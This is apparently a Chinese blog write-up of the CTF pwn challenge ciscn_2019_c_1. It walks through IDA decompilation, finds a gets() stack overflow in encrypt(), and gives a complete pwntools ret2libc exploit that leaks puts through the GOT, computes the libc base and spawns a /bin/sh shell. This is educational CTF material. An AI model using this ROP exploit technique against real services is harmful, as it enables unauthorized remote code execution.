PWN|ciscn_2019_c_1

最新推荐文章于 2023-06-17 02:29:25 发布

L__y

最新推荐文章于 2023-06-17 02:29:25 发布

阅读量439

点赞数

分类专栏： CTF 文章标签： python

本文链接：https://blog.csdn.net/l2645470582_/article/details/123186931

版权

CTF 专栏收录该内容

37 篇文章 3 订阅

订阅专栏

1.检查保护机制

（1）开启堆栈保护

（2）64位文件

2.用64位IDA打开该文件

（1）shift+f12查看关键字符串

没有看到后面函数（system等）

（2）进入mian函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h] BYREF

init(argc, argv, envp);
puts("EEEEEEE hh iii ");
puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
puts("EE mmm mm mm aa aaa cc hh hh iii nn nn eeeee ");
puts("EEEEEEE mmm mm mm aaa aa ccccc hh hh iii nn nn eeeee ");
puts("====================================================================");
puts("Welcome to this Encryption machine\n");
begin();
while ( 1 )
{
while ( 1 )
{
fflush(0LL);
v4 = 0;
__isoc99_scanf("%d", &v4);
getchar();
if ( v4 != 2 ) // v4 == 2
break;
puts("I think you can do it by yourself");
begin();
}
if ( v4 == 3 )
{
puts("Bye!");
return 0;
}
if ( v4 != 1 )
break;
encrypt(); // 加密函数
begin();
}
puts("Something Wrong!");
return 0;
}

（3）进入excrypt()函数

int encrypt()
{
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h] BYREF
__int16 v3; // [rsp+30h] [rbp-20h]

memset(s, 0, sizeof(s));
v3 = 0;
puts("Input your Plaintext to be encrypted");
gets(s); // gets函数溢出，0x50
while ( 1 )
{
v0 = (unsigned int)x;
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;
}
else
{
s[x] ^= 0xEu;
}
}
else
{
s[x] ^= 0xDu;
}
++x;
}
puts("Ciphertext");
return puts(s);
}

3.EXP

#encoding = utf-8

from pwn import *
from LibcSearcher import *

context(os = 'linux',arch = 'i386',log_level = 'debug')
#context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./ciscn_2019_c_1')
content = 1

def main():
	if content == 1:
		p = process('./ciscn_2019_c_1')
	else:
		p = remote('111.200.241.244',55494)
	
	main_addr = elf.symbols['main']
	plt_addr  = elf.plt['puts']
	got_addr  = elf.got['puts']
	ret_addr  = 0x00000000004006b9
	rdi_addr  = 0x0000000000400c83
	r15_addr  = 0x0000000000400c81

	
	payload = b'a' * (0x50+0x8) + p64(rdi_addr) + p64(got_addr) + p64(plt_addr) + p64(main_addr)
	p.sendlineafter("Input your choice!",'1')
	p.sendlineafter("Input your Plaintext to be encrypted",payload)
	p.recvuntil("Ciphertext\n")
	p.recvuntil("\n")
	puts_addr  = u64(p.recv(6).ljust(8,b'\x00'))
	print(hex(puts_addr))
	
	libc_puts_addr   = libc.symbols['puts']
	libc_system_addr = libc.symbols['system']
	libc_bin_addr    = next(libc.search(b'/bin/sh'))
	
	base_addr  	 = puts_addr - libc_puts_addr
	system_addr	 = base_addr + libc_system_addr
	bin_addr 	 = base_addr + libc_bin_addr
	
	payload1 = b'a' * (0x50+0x8) + p64(ret_addr)+ p64(rdi_addr) + p64(bin_addr) + p64(system_addr)
	p.sendlineafter("Input your choice!",'1')
	p.sendline(payload1)
	
	p.interactive()
main()